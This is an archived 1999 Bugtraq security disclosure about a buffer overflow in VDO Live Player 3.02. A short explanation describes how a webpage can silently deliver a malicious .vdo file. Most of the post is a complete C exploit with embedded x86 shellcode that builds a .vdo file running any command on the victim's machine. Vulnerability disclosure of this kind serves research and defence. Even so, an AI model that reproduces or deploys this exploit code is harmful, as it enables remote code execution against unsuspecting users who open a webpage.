=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


    Date: Пн, 13 дек 1999  00:25:16

   От: UNYUN <shadowpenguin@BACKSECTION.NET>

 Кому: BUGTRAQ@SECURITYFOCUS.COM

 Тема: VDO Live Player 3.02 Buffer Overflow

--------------------------------------------------------------------------------




Hello



VDO Live Player overflows when that reads the .vdo file that contains

the long address. If VDO Live Player is installed on the system and the

setting of browser is default, .vdo file is downloaded and executed

without the confirmation. So, if the clients visit the webpage which is

written the automatic download code of vdo file (such as META tag) that

contains the attack code, the client machine will be cracked by the

instructions which are written in vdo file.



The buffer which is specified by ESP is too small to put the complex

code, but the top line of the vdo file is stored at the address of

ecx+0x30, it is long enough to set the cracking code.



The following sample source code generates the .vdo file that

executes any commands on the visitors machine.

(This code is tested Japanese Windows98 only)



-----

/*====================================================================

   ex_vdolive.c / VDO Live Player 3.02 32bit exploit

   The Shadow Penguin Security (http://shadowpenguin.backsection.net)

   Written by UNYUN (shadowpenguin@backsection.net)

  ===================================================================

*/



#include    <stdio.h>

#include    <string.h>

#include    <windows.h>



#define     RETADR          90

#define     CODE1_OFS       102

#define     CODE2_OFS       10

#define     MAXBUF1         180

#define     MAXBUF2         1500

#define     JMPESP_1        0xff

#define     JMPESP_2        0xe4

#define     NOP             0x90

#define     KERNEL_NAME     "kernel32.dll"



unsigned char exploit_jmping[100]={

0x33,0xDB,0x8B,0x41,0x30,0xB3,0xBB,0x03,

0xC3,0xFF,0xE0,0x00};



unsigned char exploit_code[200]={

0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,

0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,

0xBF,0xFF,0xD0,0x8B,0xD0,0x52,0x43,0x53,

0x52,0x32,0xE4,0x83,0xC3,0x06,0x88,0x23,

0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,

0xF0,0x5A,0x43,0x53,0x52,0x32,0xE4,0x83,

0xC3,0x04,0x88,0x23,0xB8,0x28,0x6E,0xF7,

0xBF,0xFF,0xD0,0x8B,0xF8,0x43,0x53,0x83,

0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,

0x33,0xC0,0x50,0xFF,0xD7,0xE8,0xB0,0xFF,

0xFF,0xFF,0x00};

unsigned char cmdbuf[200]="msvcrt.dll.system.exit.";





unsigned int search_mem(unsigned char *st,unsigned char *ed,

                unsigned char c1,unsigned char c2)

{

    unsigned char   *p;

    unsigned int    adr;



    for (p=st;p<ed;p++)

        if (*p==c1 && *(p+1)==c2){

            adr=(unsigned int)p;

            if ((adr&0xff)==0) continue;

            if (((adr>>8)&0xff)==0) continue;

            if (((adr>>16)&0xff)==0) continue;

            if (((adr>>24)&0xff)==0) continue;

            return(adr);

        }

    return(0);

}



main(int argc,char *argv[])

{

    unsigned int         i,kp,ip,p1,p2;

    static unsigned char buf1[MAXBUF1],buf2[MAXBUF2],*q;

    FILE                 *fp;

    MEMORY_BASIC_INFORMATION meminfo;



    if (argc<2){

        printf("usage: %s FileName Command\n",argv[0]);

        exit(1);

    }

    if ((void *)(kp=(unsigned int)LoadLibrary(KERNEL_NAME))==NULL){

        printf("Can not find %s\n",KERNEL_NAME);

        exit(1);

    }



    VirtualQuery((void *)kp,&meminfo,sizeof(MEMORY_BASIC_INFORMATION));

    for (i=0;i<meminfo.RegionSize;i++){

        ip=kp+i;

        if ( ( ip     &0xff)==0

          || ((ip>>8 )&0xff)==0

          || ((ip>>16)&0xff)==0

          || ((ip>>24)&0xff)==0) continue;

        q=(unsigned char *)ip;

        if (*q==JMPESP_1 && *(q+1)==JMPESP_2) break;

    }

    if (i==meminfo.RegionSize){

        printf("Can not find codes which are used by this exploit.\n");

        exit(1);

    }



    printf("RETADR  : %x\n",ip);

    memset(buf1,NOP,MAXBUF1-1);

    memset(buf2,NOP,MAXBUF2-1);

    buf1[RETADR  ]=ip&0xff;

    buf1[RETADR+1]=(ip>>8)&0xff;

    buf1[RETADR+2]=(ip>>16)&0xff;

    buf1[RETADR+3]=(ip>>24)&0xff;

    strcat(cmdbuf,argv[2]);

    strncpy(buf1+CODE1_OFS,exploit_jmping,strlen(exploit_jmping));

    p1=(unsigned int)GetProcAddress((HMODULE)kp,"LoadLibraryA");

    p2=(unsigned int)GetProcAddress((HMODULE)kp,"GetProcAddress");

    printf("LoadLibrary Address    : %x\n",p1);

    printf("GetProcAddress Address : %x\n",p2);



    strcat(exploit_code,cmdbuf);

    exploit_code[0x0d]=p1&0xff;

    exploit_code[0x0e]=(p1>>8)&0xff;

    exploit_code[0x0f]=(p1>>16)&0xff;

    exploit_code[0x10]=(p1>>24)&0xff;

    exploit_code[0x21]=exploit_code[0x35]=p2&0xff;

    exploit_code[0x22]=exploit_code[0x36]=(p2>>8)&0xff;

    exploit_code[0x23]=exploit_code[0x37]=(p2>>16)&0xff;

    exploit_code[0x24]=exploit_code[0x38]=(p2>>24)&0xff;

    exploit_code[0x41]=strlen(argv[2]);



    memcpy(buf2+CODE2_OFS,exploit_code,strlen(exploit_code));



    strncpy(buf1,"vdo://",6);

    buf1[MAXBUF1]=0;

    buf2[MAXBUF2]=0;

    if ((fp=fopen(argv[1],"w"))==NULL){

        printf("Can not create '%s'\n",argv[1]);

        exit(1);

    }

    fprintf(fp,"%s/%s\n",buf1,buf2);

    printf("File '%s' is created.\n",argv[1]);

    return FALSE;

}



-----

UNYUN

% The Shadow Penguin Security [ http://shadowpenguin.backsection.net ]

   shadowpenguin@backsection.net (webmaster)

% eEye Digital Security Team [ http://www.eEye.com ]

   unyun@eEye.com